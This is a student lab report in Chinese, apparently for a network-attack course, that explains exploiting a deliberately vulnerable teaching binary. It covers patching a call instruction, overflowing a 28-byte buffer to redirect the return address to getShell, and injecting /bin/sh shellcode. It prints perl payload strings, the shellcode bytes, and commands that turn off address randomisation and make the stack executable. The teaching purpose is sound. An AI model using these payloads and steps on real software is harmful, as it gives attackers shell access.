Exp1 PC平台逆向破解 20164311
实验目标:
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。
本次实践的目标就是通过学习用两种方法运行这个代码片段。然后学习如何注入并允许任何shellcode。
实验内容:
1)手工修改可执行文件,改变程序执行流程,直接跳转到getshell。
2)利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getshell函数
3)注入一个自己制作的shellcode并运行这段shellcode。
一、需要掌握的:
1.NOP, JNE, JE, JMP, CMP汇编指令的机器码
查阅资料可知:
NOP指令:“no operation”。执行到NOP指令时,cpu仅仅继续执行NOP后面的一条指令。
JNE指令:“Jump Not Equal”,如果不相等则跳转。
JE指令:条件转移指令,如果相等则跳转。
JMP指令:无条件跳转指令。无条件跳转指令可转到内存中任何程序段。转移地址可在指令中给出,也可以在寄存器中给出,或在存储器中指出。
CMP指令:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
2.反汇编和16进制编辑器
反汇编指令
objdump
利用指令:man objdump可以了解相关参数极其含义,如图:

十六进制编程器相关指令:
:%!xxd
:%!xxd 指的是在vi编辑器中显示的文件在输入该指令后会以十六进制的形式显示。
:%!xxd -r 指的是将上述转化为十六进制的信息再转换会二进制。
实验一:手动修改机器指令
1.使用objdump -d 20164311对20164311进行反汇编

可以看到,程序在80484b5这个位置调用了foo函数。
机器指令中e8对应跳转 可以在其他函数中相同指令call位置中,对应找到机器指令的开头都为e8。
机器执行下一条指令的地址都保存在eip寄存器中,如果没有调用函数那么eip寄存器中的值应该为下一条指令的地址,如果调用了函数则eip寄存器中的值应该修改:(为下一条指令的地址+e8之后的值)。
所以根据上述条件,我们可以用16进制计算器去验证。
即:eip + d7ffffff = 80484ba-0x29 = 8048491

已知 getShell 函数位于 804847d。
即:d7fffff 应该被修改的值=0x7d - 0xba = -0x3d = 0xc3(补码转换)
然后利用 vi 编辑器 使用命令:%!xxd 以利于观看的十六进制显示方式,再用/e8 d7命令找到所在位置,修改文件20164311内的值。

再次反汇编查看更改是否正确

确认正确后并运行。

实验二:通过构造输入参数,造成BOF攻击,改变程序的执行流
使用指令:
objdump -d | more

观察foo函数可以看到:存在一段功能为读入和输出的语句。
但实际上,foo函数只给这段字符串预留了一个28字节的缓冲区(即0x1c),也就是说存在所谓的 Buffer overflow 漏洞。

根据上课所讲:堆栈中程序执行的方向上,被调用函数所分配的空间后面应当是,之前edp寄存器中的值,即是一个地址。

从左侧可以观察到,地址是4个字节 故我们有理由推测:为了修改返回地址,我们应当把想要修改的地址放在一个字符串中的第33个字节到36个字节的位置。
而33字节之前的字节可以填充任意的字符。
为此我们需要通过调试确认一下推理是否正确,以及:所确定四字节地址在输入时的摆放顺序。
当然作为攻击者的我们在实际攻击中并不可能通过反汇编来确认要攻击机器的地址位数,我们只知道缓冲区只有28字节,存在漏洞。
所以我们要先确定机器的地址位数。

然后确认我们输入的顺序

由此可以看出,发生了段错误,并且33到36字节被某些字符覆盖。
当然,对于攻击者,我们必须输入某些长度的字符去猜测被攻击机的地址长度,由于地址长度是极其有限的几个数的任意一个,故做到这一点并不麻烦。
根据我们输入字符的顺序是1234 而被覆盖的地址的顺序是4321。
故为使返回地址指向 0804847d 处的 getShell 函数,需要构造字符串:11111111222222223333333344444444\x7d\x84\x04\x08。
又由于我们没法用键盘输入这样的16进制 所以我们使用以下指令:
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > 164311
生成一个包含这些16进制内容的文件
验证以下内容是否正确:

然后利用管道 | 将上一条指令的输出 作为下一条指令的输入

实验三:注入shellcode并执行
此实验中,我们使用老师已经为我们准备好的shellcode。
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
首先,修改相关配置
root@:~# execstack -s //设置堆栈可执行
root@:~# execstack -q //查询文件的堆栈是否可执行
X 201664311
root@:~# more /proc/sys/kernel/randomize_va_space root@:~# echo "" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
root@:~# more /proc/sys/kernel/randomize_va_space root@:~#

注入一段代码,我们使用以下指令构造一个input_shellcode
perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > 164311
在该窗口运行指令
(cat ;cat) | ./
打开一个新的窗口,输入指令查询当前运行的20164311的进程号
ps -ef | grep

使用以下指令进行调试
attach disassemble foo break *0x080484ae c
查看esp寄存器的地址
info r esp
以16进制形式查看0xffffd37c地址后面16字节的内容
x/16x 0xffffd37c

从上图可知,要注入的shellcode代码应该在ret指令地址后四个字节的位置,即0xffffd37c + 0x00000004 = 0xffffd380,然后退出gdb
修改注入代码
perl -e 'print "A" x 32;print"\x80\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' >
输入命令
(cat ;cat) | ./

遇到的问题及解决方法
问题:当时在做第二个小实验进行调试的时候,输入字符串出现了异常的显示

解决办法:做实验一定要备份。因为首先网络攻防的命令较长,我们不能保证每次都输入的是对的,仅仅在vi编辑器内,没有将十六进制的文件转换会二进制就会发生文件损坏,由此可见备份文件是多么重要,然而基于这个问题,也是省略了备份文件步骤而造成的错误,直接在源文件内进行修改,所以造成完成实验一后无法正常完成实验二。
实验收获和感想
收获:每次做这个实验的时候,我都会想起老师第一节课说:一台电脑放在这里,你是否知道他在干什么。这个实验让我从更加底层的角度理解了漏洞可以如何被利用,再次之前,我还记得我在学c语言的时候,常常不会去考虑越界错误,也常常不想去做边界测试,但这次试验之后,我明白了任何一个程序都可能有漏洞,我们一定要通过学习网络攻防了解如何发现漏洞,以及利用堆栈结构造成溢出,修改返回地址的底层原理,这样才能做到更好的防患于未然。
什么是漏洞?漏洞的危害
我认为漏洞就是在编程的时候,由于程序中的数据结构存在一定的限制,或出于偶然或出于必然,从而导致计算机可以被攻击的一个缺陷
而漏洞的危害自然是会导致自己的计算机被攻击,影响正常的使用以及造成数据的泄露。
Exp1 PC平台逆向破解 20164311的更多相关文章
- 20155324《网络对抗》Exp1 PC平台逆向破解(5)M
		20155324<网络对抗>Exp1 PC平台逆向破解(5)M 实验目标 本次实践的对象是一个名为~pwn1~的~linux~可执行文件. 该程序正常执行流程是:~main~调用~foo~ ... 
- 2018-2019-2 20165237《网络攻防技术》Exp1 PC平台逆向破解
		2018-2019-2 20165237<网络攻防技术>Exp1 PC平台逆向破解 一.实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调 ... 
- 20165221 《网络对抗技术》EXP1 PC平台逆向破解
		20165221 <网络对抗技术>EXP1 PC平台逆向破解 一.实验内容 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函 ... 
- 2018-2019-2 网络对抗技术 20165325 Exp1 PC平台逆向破解
		2018-2019-2 网络对抗技术 20165325 Exp1 PC平台逆向破解(BOF实验) 实验有三个模块: (一)直接修改程序机器指令,改变程序执行流程: (二)通过构造输入参数,造成BOF攻 ... 
- 2018-2019-2 20165206《网络对抗技术》Exp1 PC平台逆向破解
		- 2018-2019-2 20165206<网络对抗技术>Exp1 PC平台逆向破解 - 实验任务 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:mai ... 
- Exp1 PC平台逆向破解  20165235 祁瑛
		Exp1 PC平台逆向破解 20165235 祁瑛 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件.该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字 ... 
- 2018-2019-2 20165317《网络对抗技术》Exp1 PC平台逆向破解
		2018-2019-2 20165317<网络对抗技术>Exp1 PC平台逆向破解 实验目的 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP:无作用,英文&quo ... 
- 2018-2019-2 网络对抗技术 20165336 Exp1 PC平台逆向破解
		2018-2019-2 网络对抗技术 20165336 Exp1 PC平台逆向破解 1. 逆向及Bof基础实践说明 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件.该程序正常 ... 
- 2018-2019-2 20165236郭金涛《网络对抗》Exp1 PC平台逆向破解
		2018-2019-2 20165236郭金涛<网络对抗>Exp1 PC平台逆向破解 一.实验内容 1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码(0.5分) 2.掌 ... 
随机推荐
- 使用delimiter //,解决mysql end报错问题
			这是我的初始报错的代码: )) begin select sc.* from sc where sno= student_no end; 会报这个错误,“Error Code: 1064. You h ... 
- Linux命令行下载工具
			目录 wget aria2 cURL Youtube-dl https://zh.wikipedia.org/wiki/下载管理程序比较 https://wiki.archlinux.org/inde ... 
- jirba库的使用和好玩的词云
			1.jieba库基本介绍 (1).jieba库概述 jieba是优秀的中文分词第三方库 - 中文文本需要通过分词获得单个的词语 - jieba是优秀的中文分词第三方库,需要额外安装 - ... 
- Linux第二节课学习笔记
			虚拟机不一定要安装12版本,但仅有12版本支持RHCE模拟考试环境,激活码可以百度. 在创建新的虚拟机过程中,安装客户机操作系统时需要选择稍后安装操作系统,否则会默认最小化安装导致后面课上很多命令不能 ... 
- CodeForce Div 2 C. Masha and two friends
			题目链接: http://codeforces.com/contest/1080/problem/C 思路:双向延长两个矩形方块的4边,会形成一个被分割为9块的更大立方体. 计算所有的9个方框.方框中 ... 
- Int和String互转的方法
			Java 中int.String的类型转换 int -> String int i=12345;String s="";第一种方法:s=i+"";第二 ... 
- 2018-2019-2 20165308网络对抗技术 Exp6:信息收集与漏洞扫描
			2018-2019-2 20165308网络对抗技术 Exp6:信息收集与漏洞扫描 实践目标 掌握信息搜集的最基础技能与常用工具的使用方法. 实践内容 (1)各种搜索技巧的应用 (2)DNS IP注册 ... 
- MySQL运行内存不足时应采取的措施?
			排除故障指南:MySQL运行内存不足时应采取的措施? 天一阁@ 老叶茶馆 1周前 导读 排除故障指南:MySQL运行内存不足时应采取的措施? 翻译团队:知数堂藏经阁项目 - 天一阁 团队成员:天一阁- ... 
- ajax高级操作
			$('#ajax_submit').click(function () { $.ajax({ 'url':'/app_ajax', 'type':'post', 'data':$("#f1& ... 
- 工控随笔_18_西门子_WinCC的VBS脚本_07_变量作用域和传值、传址
			在vbs脚本中也存在和其他编程语言一样的概念,那就是变量的作用域,变量的作用域决 定在什么范围内可以访问. 同样的在vbs脚本中对于变量也有一个生命周期, 变量的生命周期决定了变量的存续时间 这个主要 ... 
